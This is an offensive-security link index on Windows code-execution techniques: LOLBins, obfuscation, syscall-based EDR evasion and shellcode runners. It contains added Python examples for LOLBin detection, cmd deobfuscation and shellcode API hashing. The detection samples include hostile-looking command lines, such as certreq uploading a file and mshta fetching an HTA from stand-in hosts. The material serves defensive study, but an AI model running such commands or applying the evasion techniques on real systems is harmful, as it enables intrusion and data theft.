  - Code Execution with JDK Scripting Tools & Nashorn Javascript Engine - Brett Hawkins(Derbycon2018)
    - There are several languages and methods used to execute code on a computer system, such as C#, Powershell, Python, VBA, and many more. The defense is getting better, which has caused the offense to adapt and look for innovative ways to “live off the land”. One area that has not been explored deeply is utilizing tools that the Java Development Kit (JDK) provides. According to a statement by Oracle, Java runs on 3 billion devices. Enterprises depend on Java running on their user endpoints and servers in order to keep their businesses running. This makes using tools installed with the JDK very enticing to attackers. This talk will explore using JDK command-line scripting tools and the Nashorn Javascript Engine to perform several actions, such as downloading files, executing scripts locally and remotely, and gaining a remote interactive shell to a computer system. Detective and preventive controls will also be discussed for the usage of these JDK scripting tools.
  - Living off the land: enterprise post-exploitation - Adam Reiser(Derbycon2018)
    - You've compromised that initial server and gained a foothold in the target network: congratulations! But wait - the shadow file has no hashes but root, the ssh keys have strong passphrases, and all the interesting traffic is encrypted - there's nothing of value here! Or is there? In this talk, I will explore post-exploitation techniques for turning your compromised bastion hosts into active credential interceptors under a variety of blue team monitoring scenarios.
  - WEBCAST: Hacker Tools, Compliments of Microsoft - David Fletcher & Sally Vandeven(2018)
    - Slides
    - Join David “Fletch” and Sally as they explore the cornucopia of wonderful, free tools in the SysInternals Suite that conveniently are signed by Microsoft and that they use on a daily basis to hack their customers.
  - #LOLBins - Nothing to LOL about! - Oddvar Moe(Derbycon2018)
    - You have probably heard the term LOLBin, LOLScript or LOLLib by now. Want to get more insights on that? Then this is the talk you want to attend. This talk will cover the Living Off The Land Binaries and Scripts (LOLBAS) project, what the project is, how it came to be and how you can help this evolve into the future. The talk will also go over some of my favorite LOLBins that have come to light due to this project (at least that's what I like to think) and show you some cool stuff! I mean, everybody loves to see binaries misbehave.
  - Covert Attack Mystery Box: A few novel techniques for exploiting Microsoft "features" - Mike Felch and Beau Bullock (WWHF2018)
    - Over the last few months we’ve been doing a bit of research around various Microsoft “features”, and have mined a few interesting nuggets that you might find useful if you’re trying to be covert on your red team engagements. This talk will be “mystery surprise box” style as we’ll be weaponizing some things for the first time. There will be demos and new tools presented during the talk. So, if you want to win at hide-n-seek with the blue team, come get your covert attack mystery box!
- In-the-Spirit-Of
  - BADministration
    - BADministration is a tool which interfaces with management or administration applications from an offensive standpoint. It attempts to provide offsec personnel a tool with the ability to identify and leverage these non-technical vulnerabilities. As always: use for good, promote security, and fight application propagation.
- Not really
  - 101
Bring-Your-Own-Land
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
  - BYOI (Bring Your Own Interpreter) payloads - Marcello Salvati(RomHack2020)
    - Slides
    - Offensive PowerShell tradecraft is in “Zombie Mode”: it’s sort of dead, but not entirely. With all of the defenses Microsoft has implemented in the PowerShell runtime over the past few years Red Teamers / Pentesters & APT groups have started to shy away from using PowerShell based payloads/delivery mechanisms and migrate over to C#. However, C# is a compiled language. Operationally this has a few major downsides: we can’t be as “flexible” as setting up a proper development environment has an overhead and can be time consuming and you have to compile all the things all the time etc.
Bring-Your-Own-Driver
Execution
- Articles/Blogposts/Writeups
  - CodeExecutionOnWindows
    - A list of ways to execute code, including examples, is shown below. Note that UAC bypasses and DLL hijacking will not be included as these are covered elsewhere.
- LoLBins
  - Certreq.exe
  - Nuget/Squirrel/Electron
  - Microsoft.Workflow.Compiler.exe
  - MSBuild
    - 101
      - MSBuild - docs.ms
      - MSBuild Inline Tasks - docs.ms
      - Understanding the Project File(MSBuild) - docs.ms
      - Understanding the project file - docs.ms
        - Microsoft Build Engine (MSBuild) project files lie at the heart of the build and deployment process. This topic starts with a conceptual overview of MSBuild and the project file. It describes the key components you'll come across when you work with project files, and it works through an example of how you can use project files to deploy real-world applications.
    - Articles/Blogposts/Writeups
      - MSBuild: A Profitable Sidekick! - Sarah Norris(2020)
      - MSBuild without MSBuild - pentestlaboratories(2020)
        - [...]MSBuild is no longer required to execute code since it is possible to use a .NET assembly that will call the malicious .csproj from a remote location (UNC path). This technique doesn’t leave any artifacts since it doesn’t touch the disk and the code is injected into a legitimate Windows process, Internet Explorer.
      - Doing More With MSBuild - 3gstudent
      - Remotely Host MSBuild Payloads - Joe Leon(2020)
        - tl;dr Separate your C# payload from a MSBuild XML file and host it remotely on a WebDav server.
      - Another MSBuild Invocation (February 2020 Edition) - Joe Leon(2020)
        - TL;DR: Use MSBuild’s UnregisterAssembly task to execute arbitrary code in a .NET assembly.
    - Tools
      - MSBuildAPICaller
        - MSBuild Without MSBuild.exe
      - NoMSBuild
        - MSBuild without MSbuild.exe
  - MSI
    - 101
      - Windows Installer - docs.ms
      - Windows Installer - Wikipedia
    - The Return of Raining SYSTEM Shells with Citrix Workspace app
      - Back in July I documented a new Citrix Workspace vulnerability that allowed attackers to remotely execute arbitrary commands under the SYSTEM account. Well after some further investigation on the initial fix I discovered a new vector that quite frankly should not exist at all since the previous reported vulnerability. The core of the issue lies with a remote command line injection vulnerability that allows attackers to bypass Citrix signed MSI installers using a malicious MSI transform.
    - PwnyForm
      - PwnyForm will take an MSI installer as input and generate an MSI transform (mst) that can be used to inject arbitrary command execution by adding a custom action that will execute during the UI or Install sequence of an MSI file. The generated MST produces a JScript custom action that will by default launch cmd.exe; the executed command can be overridden using the CMD MSI property.
  - MSHTA
    - Internet Explorer MSHTA Security Threat - Dennis Faas(2003)
    - The Malware Hiding in Your Windows System32 Folder: Mshta, HTA, and Ransomware - Andy Green(2020)
    - MSHTA code execution - bypass application whitelisting. - @spottheplanet
    - Bypass Application Whitelisting using mshta.exe (Multiple Methods) - Raj Chandel
    - w.e w.e Internet Explorer Does What It Wants - Aaron Heikkila(GrrCON2018)
  - MS Office
    - Excel
      - Tools
        - Hello World XLL
          - This is a simple XLL, showing how to create an XLL from scratch.
        - xllpoc
          - A small project that aggregates community knowledge for Excel XLL execution, via xlAutoOpen() or PROCESS_ATTACH.
  - MS Teams
  - Windows Update Client(wuauclt)
  - 3rd-Party LoLbins
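As an added example (not code from the LOLBAS project or from any of the writeups above), here is a small detection pass over process-creation events for the binaries this section and the Living_off_The_Land section single out: mshta.exe pulling an HTA or running an inline script URI, certreq.exe `-Post` used as a file channel, MSBuild fed a project file from a user-writable or UNC location, wuauclt.exe's `/UpdateDeploymentProvider <dll> /RunHandlerComServer` DLL load, and Microsoft.Workflow.Compiler.exe at all, plus any of them spawned by an Office process. The events are constructed to resemble the image, command line and parent fields of a Sysmon event 1 or a 4688 with command-line auditing; the rule wording and the "suspicious directory" list are this example's own, so expect to tune them against your baseline (a developer workstation will legitimately run MSBuild from odd paths).

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    image: str          # executable name as logged (Sysmon event 1 Image / 4688 NewProcessName basename)
    command_line: str
    parent_image: str


URL = r"\b(?:https?|ftp)://"
UNC = r"\\\\[^\\\s]+\\"


def rule(pattern: str, reason: str):
    return re.compile(pattern, re.I), reason


# Argument shapes that distinguish abuse of each LOLBin from its everyday use.
LOLBIN_RULES: Dict[str, list] = {
    "mshta.exe": [
        rule(URL, "mshta fetching an HTA over HTTP"),
        rule(r"\b(?:javascript|vbscript):", "mshta running an inline script URI"),
    ],
    "certreq.exe": [
        rule(r"-post\b.*" + URL, "certreq -Post used as an HTTP upload/download channel"),
    ],
    "msbuild.exe": [
        rule(r"\\(?:temp|appdata|public|downloads)\\.*\.(?:csproj|xml|proj)\b",
             "msbuild project file in a user-writable location"),
        rule(UNC, "msbuild project loaded over a UNC path"),
    ],
    "wuauclt.exe": [
        rule(r"/updatedeploymentprovider\b.*\.dll\b.*/runhandlercomserver\b",
             "wuauclt loading an arbitrary DLL via /UpdateDeploymentProvider"),
    ],
    "microsoft.workflow.compiler.exe": [
        rule(r"\S", "Microsoft.Workflow.Compiler.exe compiling and running supplied XOML/C#"),
    ],
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def evaluate(event: ProcessEvent) -> List[str]:
    """Reasons this event looks like LOLBin abuse; an empty list means nothing matched."""
    image = event.image.lower()
    reasons = [reason for pattern, reason in LOLBIN_RULES.get(image, [])
               if pattern.search(event.command_line)]
    if image in LOLBIN_RULES and event.parent_image.lower() in OFFICE_PARENTS:
        reasons.append(f"{image} spawned by Office process {event.parent_image}")
    return reasons


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str, List[str]]]:
    """(index, image, reasons) for every event that triggered at least one rule."""
    hits = []
    for idx, event in enumerate(events):
        reasons = evaluate(event)
        if reasons:
            hits.append((idx, event.image, reasons))
    return hits


# Constructed events; hosts, paths and URLs are made up.
SAMPLE_EVENTS = [
    ProcessEvent("mshta.exe", "mshta.exe http://example.invalid/inv.hta", "winword.exe"),
    ProcessEvent("certreq.exe", r"certreq.exe -Post -config https://example.invalid/up C:\Users\alice\notes.txt", "cmd.exe"),
    ProcessEvent("msbuild.exe", r"msbuild.exe C:\Users\alice\AppData\Local\Temp\build.csproj", "powershell.exe"),
    ProcessEvent("msbuild.exe", r"msbuild.exe C:\src\app\app.csproj /t:Build", "devenv.exe"),
    ProcessEvent("wuauclt.exe", r"wuauclt.exe /UpdateDeploymentProvider C:\Users\Public\upd.dll /RunHandlerComServer", "cmd.exe"),
    ProcessEvent("wuauclt.exe", "wuauclt.exe /detectnow", "svchost.exe"),
    ProcessEvent("svchost.exe", "svchost.exe -k netsvcs", "services.exe"),
]

if __name__ == "__main__":
    for idx, image, reasons in scan(SAMPLE_EVENTS):
        print(f"[{idx}] {image}: " + "; ".join(reasons))
```

The rules key on the command line because that is where these binaries give themselves away; events logged without command-line auditing (4688 by default) only let you match on the image and parent, which is why the Office-parent rule is kept separate.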
Command and Scripting Interpreter
- Cmd.exe
  - Articles/Blogposts/Writeups
  - CMD Arg Spoofing
    - Articles/Blogposts/Writeups
    - Tools
  - Obfuscation
    - Articles/Blogposts/Writeups
      - DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques - Daniel Bohannon(2018)
      - Cmd Hijack - a command/argument confusion with path traversal in cmd.exe - Julian Horoszkiewicz(2020)
      - Hiding process creation and cmd line with a long com… - Hexacorn(2020)
      - Tried and True Hacker Technique: DOS Obfuscation - John Hammond(2020)
    - Tools
      - Invoke-DOSfuscation
        - Cmd.exe Command Obfuscation Generator & Detection Test Harness
- PPID Spoofing
  - Articles/Blogposts/Writeups
- .NET
  - Articles/Blogposts/Writeups
    - Running a .NET Assembly in Memory with Meterpreter - Thomas Hendrickson(2019)
      - In this blog post I will discuss leveraging Meterpreter’s powershell module to execute .NET assemblies in-memory.
- WebAssembly
  - Articles/Blogposts/Writeups
  - Tools
    - WASSUP-WASM
      - "WASSUP-WASM" is a tiny application that can be used to download and execute the WebAssembly binary using Node.JS.
- XSL Script Processing
  - Articles/Blogposts/Writeups
  - Tools
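Worked example for the Cmd.exe obfuscation writeups above, added here and not taken from Invoke-DOSfuscation or those articles: a small deobfuscator that undoes the three tricks they describe, caret insertion (`c^a^l^c`), `%VAR:~start,len%` substring extraction out of environment variables such as COMSPEC, and `%VAR:str=rep%` substitution, together with the `set x=...&&call %x...%` idiom that lets a one-liner use a variable it just defined. The environment values are constructed. Real cmd.exe has more parsing phases than this (delayed expansion, `for` loops, `cmd /V`), so treat this as a first-pass normaliser for logged command lines rather than a faithful interpreter.

```python
import re
from typing import Dict, List, Optional

# Constructed environment; real values vary per host, but COMSPEC is the classic
# source of letters like "c", "m", "d" in obfuscated one-liners.
SAMPLE_ENV: Dict[str, str] = {
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
    "PUBLIC": r"C:\Users\Public",
}

SUBSTR_RE = re.compile(r"%(\w+):~(-?\d+)(?:,(-?\d+))?%")   # %VAR:~start[,length]%
REPLACE_RE = re.compile(r"%(\w+):([^=%]+)=([^%]*)%")        # %VAR:str=rep%
PLAIN_RE = re.compile(r"%(\w+)%")                           # %VAR%


def split_statements(line: str) -> List[str]:
    """Split on `&` / `&&` outside double quotes, dropping carets (cmd's escape character) on the way."""
    statements, current, in_quotes, i = [], [], False, 0
    while i < len(line):
        c = line[i]
        if c == '"':
            in_quotes = not in_quotes
            current.append(c)
        elif c == "^" and not in_quotes and i + 1 < len(line):
            current.append(line[i + 1])        # escaped character is taken literally
            i += 1
        elif c == "&" and not in_quotes:
            statements.append("".join(current))
            current = []
            if i + 1 < len(line) and line[i + 1] == "&":
                i += 1
        else:
            current.append(c)
        i += 1
    statements.append("".join(current))
    return [s.strip() for s in statements if s.strip()]


def cmd_substring(value: str, start: int, length: Optional[int]) -> str:
    """%VAR:~start,length% semantics: negative start counts from the end, negative length trims from the end."""
    n = len(value)
    begin = start if start >= 0 else max(n + start, 0)
    if length is None:
        end = n
    elif length >= 0:
        end = begin + length
    else:
        end = n + length
    return value[begin:end]


def expand(statement: str, env: Dict[str, str]) -> str:
    """One round of percent expansion; unknown variables are left untouched, as on the command line."""
    def substr(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        length = int(m.group(3)) if m.group(3) is not None else None
        return cmd_substring(value, int(m.group(2)), length)

    def replace(m):
        value = env.get(m.group(1).upper())
        if value is None:
            return m.group(0)
        return re.sub(re.escape(m.group(2)), lambda _: m.group(3), value, flags=re.I)

    def plain(m):
        return env.get(m.group(1).upper(), m.group(0))

    statement = SUBSTR_RE.sub(substr, statement)
    statement = REPLACE_RE.sub(replace, statement)
    return PLAIN_RE.sub(plain, statement)


def deobfuscate(line: str, env: Dict[str, str]) -> List[str]:
    """Return the commands cmd.exe would end up running for a one-liner.

    Percent references are expanded once against the environment as it was when the line was
    parsed, so a `set` on the same line is invisible to later statements unless they are
    prefixed with `call`, which re-expands them; that is why obfuscated one-liners look like
    `set x=...&&call %x:~...%`."""
    initial, current = dict(env), dict(env)
    commands = []
    for raw in split_statements(line):
        statement = expand(raw, initial)
        lowered = statement.lower()
        if lowered.startswith("set "):
            assignment = statement[4:].strip()
            if assignment.startswith('"') and assignment.endswith('"'):
                assignment = assignment[1:-1]
            name, _, value = assignment.partition("=")
            current[name.strip().upper()] = value
            continue
        if lowered.startswith("call "):
            statement = expand(statement[5:].strip(), current)
        commands.append(statement)
    return commands


if __name__ == "__main__":
    for sample in ("c^a^l^c", "set a=calc&&call %a:~0,4%", "%COMSPEC:~-7,3% /c %PUBLIC:~0,2%"):
        print(f"{sample!r} -> {deobfuscate(sample, SAMPLE_ENV)}")
```

Detection follow-up: the same string features this code strips out (carets in the image name, `:~` and `:...=` inside percent pairs, `set`/`call` pairs on one line) are the cheap indicators to alert on before any decoding.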
Compiled HTML Files
- 101
- Articles/Blogposts/Writeups
  - CHM Badness Delivers a Banking Trojan - Rodel Mendrez(2017)
  - Malicious CHM Files Being Used to Install Brazilian Banking Trojans - Lawrence Abrams(2017)
  - PuTTY vulnerability vuln-chm-hijack - chiark.greenend.org(2019)
    - Potential malicious code execution via CHM hijacking (CVE-2019-9896)
  - What the Shell? New Security Breach Uses CHM Files to Cover Banking Trojans - Douglas Bonderud(2017)
- Tools
  - Malicious-CHM-Guide.md - mgeeky
    - CheatSheet describing how to create a malicious CHM file by hand (another approach is to use Nishang's Out-Chm scriptlet).
  - Out-CHM.ps1
Component-Object-Model
- 101
  - See (D)COM
- Articles/Blogposts/Writeups
ControlPanel Items
- 101
- Articles/Blogposts/Writeups
  - Starting a Dynamic-link Library as a Control Panel File(Vault7)
  - FalconFriday — Process injection and malicious CPL files — 0xFF03 - Henri Hambartsumyan(2020)
  - Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spottheplanet
  - Code Execution through Control Panel Add-ins - @spottheplanet
- Tools
  - CPLResourceRunner
    - Run shellcode from resource
DLL-Related
- 101
  - DLLsForHackers
    - DLLs that can be used for side loading and other attack vectors. These DLLs will not cause a deadlock since they only use functions that are DllMain-safe, as described below.
- DLL Injection
  - See DLL Injection
- Hijacking
  - Articles/Blogposts/Writeups
  - Tools
- Proxying
  - DLL Import Redirection in Windows 10 1909 - James Forshaw(2020)
Downloaders
Exploitation for Client Execution
- Articles/Blogposts/Writeups
  - CVE-2019-0726 - MWRLabs
    - DHCP client RCE
  - Analysis of CVE-2020-0605 – Code Execution using XPS Files in .NET - MDSec(2020)
    - Microsoft patched a number of deserialisation issues using the XPS files. Although the patch for CVE-2020-0605 was released in January 2020, it was incomplete and an additional update was released in May 2020. The patched issue could be useful to exploit any code that deals with the XPS file using .NET libraries. The identified issues could also be helpful as bridged gadgets when exploiting XAML deserialisation related issues.
Indirect Execution
Inter-Process Communication
- Component Object Model and Distributed COM
  - Articles/Blogposts/Writeups
  - Tools
- DDE
  - See Phishing.md
  - Articles/Blogposts/Writeups
  - Tools
Scripting Host
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
  - Establishing A Foothold With JavaScript - Casey Smith(Derbycon2016)
    - Yes, you read that right. JavaScript is everywhere, and is often overlooked. This talk will briefly outline some tactics you can use to establish a foothold and persist in an Enterprise network using only JavaScript. I will demonstrate some fileless persistence mechanisms.
Native API(Syscalls & WinAPI)
- 101
  - Windows API - Wikipedia
  - Windows API index - docs.ms
    - The following is a list of the reference content for the Windows application programming interface (API) for desktop and server applications. Using the Windows API, you can develop applications that run successfully on all versions of Windows while taking advantage of the features and capabilities unique to each version. (Note that this was formerly called the Win32 API. The name Windows API more accurately reflects its roots in 16-bit Windows and its support on 64-bit Windows.)
  - System calls: What are system calls and why are they necessary?
  - System Calls - docs.ms
  - How Do Windows NT System Calls REALLY Work? - John Gulbrandsen
  - Windows X86-64 System Call Table (XP/2003/Vista/2008/7/2012/8/10) - Mateusz "j00ru" Jurczyk
  - FreshyCalls: Syscalls Freshly Squeezed! - ElephantSe4l(2020)
  - Syscalls with D/Invoke - RastaMouse(2021)
  - Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams - @modexpblog(2020)
- Learning
- Articles/Blogposts/Writeups
  - Struggling between syscall or sysenter (Windows) - StackOverflow
  - Intercepting System Calls on x86_64 Windows - Jurriaan Bremer(2012)
  - On Windows Syscall Mechanism and Syscall Numbers Extraction Methods - Simone Margaritelli(2014)
  - Accessing the Windows API Directly - Osanda Malith(2015)
  - WinAPI Documentation - Steve Donovan
  - Making Raw Syscalls on Windows From Python - Spencer(2017)
  - Win32k System Call Filtering Deep Dive - Morten Schenk(2017)
  - The Windows 10 TH2 INT 2E mystery - Adrien Chevalier(2018)
  - Malware Mitigation when Direct System Calls are Used - Hod Gavriel(2018)
  - SharedUserData SystemCall Hook - uninformed Vol.3
  - Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR - Cornelis de Plaa(2019)
    - In this blog post we will explore the use of direct system calls, restore hooked API calls and ultimately combine this with a shellcode injection technique called sRDI. We will combine these techniques in proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, while not touching disk and evading AV/EDR monitored user-mode API calls.
  - Calling Syscalls Directly from Visual Studio to Bypass AVs/EDRs - @spottheplanet
  - Retrieving ntdll Syscall Stubs from Disk at Run-time - @spottheplanet
  - System calls on Windows x64 - n4r1b(2019)
  - Using Syscalls to Inject Shellcode on Windows - Solomon Sklash(2020)
  - Undocumented Windows API Functions & Structures - Rake
  - Red Team Tactics: Utilizing Syscalls in C# - Prerequisite Knowledge - Jack Halon
  - Red Team Tactics: Utilizing Syscalls in C# - Writing The Code - Jack Halon
  - Tutorial Understanding Windows SysCalls - SysCall Dumper - Timb3r
  - Fuzzing the Windows API for AV Evasion - Winternl(2020)
- Talks/Presentations/Videos
  - Getting Windows to Play with Itself: A Pen Testers Guide to Windows API Abuse - Brady Bloxham(Derbycon2014)
    - Windows APIs are often a blackbox with poor documentation, taking input and spewing output with little visibility on what actually happens in the background. By reverse engineering (and abusing) some of these seemingly benign APIs, we can effectively manipulate Windows into performing stealthy custom attacks using previously unknown persistent and injection techniques. In this talk, we’ll get Windows to play with itself nonstop while revealing 0day persistence, previously unknown DLL injection techniques, and Windows API tips and tricks. To top it all off, a custom HTTP beaconing backdoor will be released leveraging the newly released persistence and injection techniques. So much Windows abuse, so little time.
- Tools
  - SysWhispers
    - SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.
  - directInjectorPOC
    - Small POC written in C# that performs shellcode injection on x64 processes using direct syscalls as a way to bypass user-land EDR hooks.
  - hunter - fdiskyou
  - CallObfuscator
    - Obfuscate specific windows apis with different apis
  - SyscallPOC
    - A simple proof of concept shellcode injector using syscalls.
  - VBA-RunPE
    - A VBA implementation of the RunPE technique or how to bypass application whitelisting.
  - SharpSploit.Execution.DynamicInvoke
  - CallMon
    - CallMon is an experimental system call monitoring tool that works on Windows 10 versions 2004+ using PsAltSystemCallHandlers
  - Windows-API-Fuzzer
    - Designed to learn OS specific anti-emulation patterns by fuzzing the Windows API.
  - WinAltSyscallHandler
    - Some research on AltSystemCallHandlers functionality in Windows 10 20H1 18999
  - FreshyCalls PoC
    - A simple dumper as FreshyCalls' PoC. That's what's trendy, isn't it? ¯\_(ツ)_/¯
Processes
Scheduled Task/Job
- AT
- Scheduled Task
Shared Modules
- Tools
  - DueDLLigence
    - Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.
Shellcode Execution, Injection & Runners
- 101
- Learning Shellcoding
  - Win32
    - Articles/Blogposts/Writeups
      - https://web.archive.org/web/20150522211938/http://expdev.byethost7.com/2015/05/22/shellcode/
      - https://vividmachines.com/shellcode/shellcode.html
      - Understanding Windows Shellcode - Skape(2003)
      - Win32 Shellcode - Intro - bolo(2019)
      - The Art of Win32 Shellcoding - AmrThabet(2012)
      - Finding Kernel32 Base and Function Addresses in Shellcode - @spotheplanet
      - Windows Shellcoding x86 – Hunting Kernel32.dll – Part 1 - paranoidninja(2018)
    - Talks/Presentations/Videos
      - POP POP RETN An Introduction to Writing Win32 Shellcode - Christopher Maddalena(Derbycon2017)
        - Slides
        - If you have ever worked with an exploit or Metasploit, you have probably used shellcode, but do you know how it is made? This talk has been designed to walk you through the ins and outs of basic shellcode, with a focus on Windows and the x86 architecture. There will be a review of the basic computer science behind shellcode, a look under the hood at how msfvenom works and how you can recreate msfvenom’s shellcode in Assembly, and then a walkthrough and a demo of how you can create a custom connectback stager using Assembly.
    - Samples of
  - x64
    - 101
      - Windows x64 Shellcode - Topher Timzen(2014)
        - I will go over the differences between 32 and 64 bit assembly that I have noticed and how to work with them as well as some of the structures windows uses that are useful to know about for shellcode in the 64bit environment. I will also introduce two tools that I have created in helping my exploit development process.
    - Learning
      - https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/
    - Samples of
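Added example, not from the writeups above: the ROR13 API hashing that position-independent Win32 shellcode uses once it has walked the PEB to kernel32, written out in Python so both halves of the hash are visible. The module half runs over the loader's BaseDllName as UTF-16LE for MaximumLength bytes (so including the two-byte terminator), uppercasing byte by byte the way the `cmp al,'a' ; jl ; sub al,0x20` sequence does; the function half runs over the ASCII export name including its NUL; the shellcode compares the 32-bit sum against a constant baked into it, which is why the same hashing loop resolves any export without the name ever appearing in the payload. The export table it resolves against is constructed; real shellcode walks kernel32's export directory instead.

```python
from typing import Dict, Optional

MASK = 0xFFFFFFFF


def ror13(value: int) -> int:
    """32-bit rotate right by 13, the `ror r9d, 13` / `ror edi, 13` step of the hashing loop."""
    value &= MASK
    return ((value >> 13) | (value << 19)) & MASK


def module_hash(base_dll_name: str) -> int:
    """Hash of BaseDllName as the loader stores it: UTF-16LE plus the two-byte NUL terminator
    (the loop counts MaximumLength bytes).  Each byte in 'a'..0x7f has 0x20 subtracted, so
    upper- and lower-case spellings of the module name hash the same."""
    h = 0
    for b in base_dll_name.encode("utf-16-le") + b"\x00\x00":
        if 0x61 <= b < 0x80:     # `cmp al,'a' ; jl` is a signed compare, so bytes >= 0x80 are left alone
            b -= 0x20
        h = (ror13(h) + b) & MASK
    return h


def function_hash(export_name: str) -> int:
    """Hash of an export name as it sits in the export name table: ASCII up to and including the NUL."""
    h = 0
    for b in export_name.encode("ascii") + b"\x00":
        h = (ror13(h) + b) & MASK
    return h


def api_hash(module: str, function: str) -> int:
    """The 32-bit constant the shellcode carries: module hash + function hash, truncated."""
    return (module_hash(module) + function_hash(function)) & MASK


def resolve(module: str, export_table: Dict[str, int], wanted: int) -> Optional[int]:
    """Walk a (constructed) export table the way the shellcode walks kernel32's: hash every name
    until one matches `wanted` and return its address."""
    for name, address in export_table.items():
        if api_hash(module, name) == wanted:
            return address
    return None


# Constructed export table; the addresses are illustrative.
FAKE_KERNEL32: Dict[str, int] = {
    "LoadLibraryA": 0x7FF800001000,
    "WinExec": 0x7FF800002000,
    "ExitProcess": 0x7FF800003000,
}

if __name__ == "__main__":
    for name in FAKE_KERNEL32:
        h = api_hash("KERNEL32.DLL", name)
        print(f"kernel32.dll!{name:12s} hash=0x{h:08x} -> 0x{resolve('kernel32.dll', FAKE_KERNEL32, h):x}")
```

A detection aside: because the hash constants are fixed for a given loop, the immediates that `api_hash` produces for common pairs (kernel32!LoadLibraryA, kernel32!WinExec, ws2_32!WSASocketA) are themselves a reliable signature for this family of shellcode, which is why custom shellcode changes the rotate count or seeds the hash.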
Execution
-
101
-
A Beginner’s Guide to Windows Shellcode Execution Techniques - Carsten Sandker(2019)
- Code
- This blog post is aimed to cover basic techniques of how to execute shellcode within the memory space of a process.
-
A Beginner’s Guide to Windows Shellcode Execution Techniques - Carsten Sandker(2019)
-
Articles/Blogposts/Writeups
-
Abusing native Windows functions for shellcode execution - Jeff White(2017)
- "I've been doing a lot of analysis on malicious docs (maldocs) lately and, among a popular variant circulating right now, is a technique that I found particularly interesting. Effectively, it abuses native Windows function calls to transfer execution to shellcode that it loads into memory. I thought it was cool in this context, and not something that I was super familiar with, even though I've since learned it's a very old technique, so I set out to do some research in identifying additional functions that could be abused in a similar way and how to leverage them
- GOing 4 A Run - Leo Pitt(2020)
- A Fundamental Tool in the Toolkit: Evasive Shellcode Launchers – Part 1 - Nichoali Wang(2020)
- C_Shot - Just What The Doctor Ordered - redxorblue(2020)
- In-Memory shellcode decoding to evade AVs/EDRs - Askar(2020)
- Executing shellcode with Unsafe Native Methods in PowerShell - mez0(2020)
-
Abusing native Windows functions for shellcode execution - Jeff White(2017)
-
101
-
Injection
- 101
- Articles/Blogposts/Writeups
-
Tools
-
shellcode-process-injection
- Simple C implementation to perform shellcode process injection via win32 APIs
- fido
-
shellcode-process-injection
-
Tools
- Generators
-
Venom
- The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( C# | python | ruby | dll | msi | hta-psh | docm | apk | macho | elf | deb | mp4 | etc ) injects the shellcode generated into one template (example: python) "the python funtion will execute the shellcode into ram" and uses compilers like gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file. It also starts a multi-handler to recive the remote connection (shell or meterpreter session). 'venom generator' reproduces some of the technics used by Veil-Evasion.py, unicorn.py, powersploit.py, etc..
-
Repo
-
go-shellcode(Ne0nd0g)
- A repository of Windows Shellcode runners and supporting utilities. The applications load and execute Shellcode using various API calls or techniques.
-
Runners
-
C_Shot
- C_Shot is an offensive security tool written in C which is designed to download, inject, and execute shellcode in memory.
-
go-shellcode
- This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection.
-
Go4aRun
- Shellcode runner in GO that incorporates shellcode encryption, remote process injection, block dlls, and spoofed parent process
-
UrbanBishopLocal
- A port of FuzzySecurity's UrbanBishop project for inline shellcode execution
-
DueDLLigence
- Shellcode runner framework for application whitelisting bypasses and DLL side-loading. The shellcode included in this project spawns calc.exe.
-
ShellcodeCompiler
- Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows (x86 and x64) and Linux (x86 and x64). It is possible to call any Windows API function or Linux syscall in a user-friendly way.
- Crab-Runner
-
Utilities
-
pe_to_shellcode
- Converts a PE so that it can then be injected just like normal shellcode (at the same time, the output file remains a valid PE). Supports both 32- and 64-bit PEs. Authors: @hasherezade & @hh86
-
Shellcoding(Mr-Un1k0d3r)
- Shellcoding Utilities and shellcode obfuscator generator.
-
ShellcodeWrapper
- Shellcode wrapper with encryption for multiple target languages
- Software Deployment Tools
-
System Services
-
Service Execution
- Articles/Blogposts/Writeups
-
Task Scheduler
-
101
- Windows Task Scheduler - Wikipedia
-
Task Scheduler for developers - docs.ms
- The Task Scheduler enables you to automatically perform routine tasks on a chosen computer. Task Scheduler does this by monitoring whatever criteria you choose (referred to as triggers) and then executing the tasks when those criteria are met. You can use the Task Scheduler to execute tasks such as starting an application, sending an email message, or showing a message box. Tasks can be scheduled to execute in response to these events, or triggers.
- Articles/Blogposts/Writeups
-
Third-Party Software
-
Articles/Blogposts/Writeups
-
Abusing Firefox in Enterprise Environments - Daniil Vylegzhanin(2020)
- In this blogpost, we will describe a technique that abuses legacy Firefox functionality to achieve command execution in enterprise environments. The security issue was that the compromised domain user had Full Control rights on the files stored in the GPO, which were then subsequently deployed by SCCM to the Mozilla Firefox installation folder for all computer objects within the OU where the GPO was applied.
- Talks/Presentations/Videos
- Tools
-
User Execution
-
Malicious Link
- Articles/Blogposts/Writeups
- Malicious File
- VBScript
-
Windows Diagnostic Tools
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
Using Windows diagnostics for system compromise - Nicholas Berthaume "aricon"(Derbycon2015)
- This talk will discuss the merits of using Microsoft diagnostic tools in order to deliver payloads to modern Microsoft operating systems with little or no scrutiny by anti-virus and network intrusion sensors. In it I will go over the reasons for using this tool-set including the advantages of more conventional techniques as well as the reasoning behind its exploration vs. more invasive payloads including those reliant on bugs to provide system compromise. Additionally a tool will be introduced that will provide for the creation of payloads on compatible *nix operating systems whereas previously they could only be generated using the Microsoft SDK on their operating systems. Additionally there will be an element of privilege escalation by way of UAC bypass on default configurations of the windows operating system.
-
Windows Management Instrumentation
- Articles/Blogposts/Writeups
-
Talks/Presentations/Videos
-
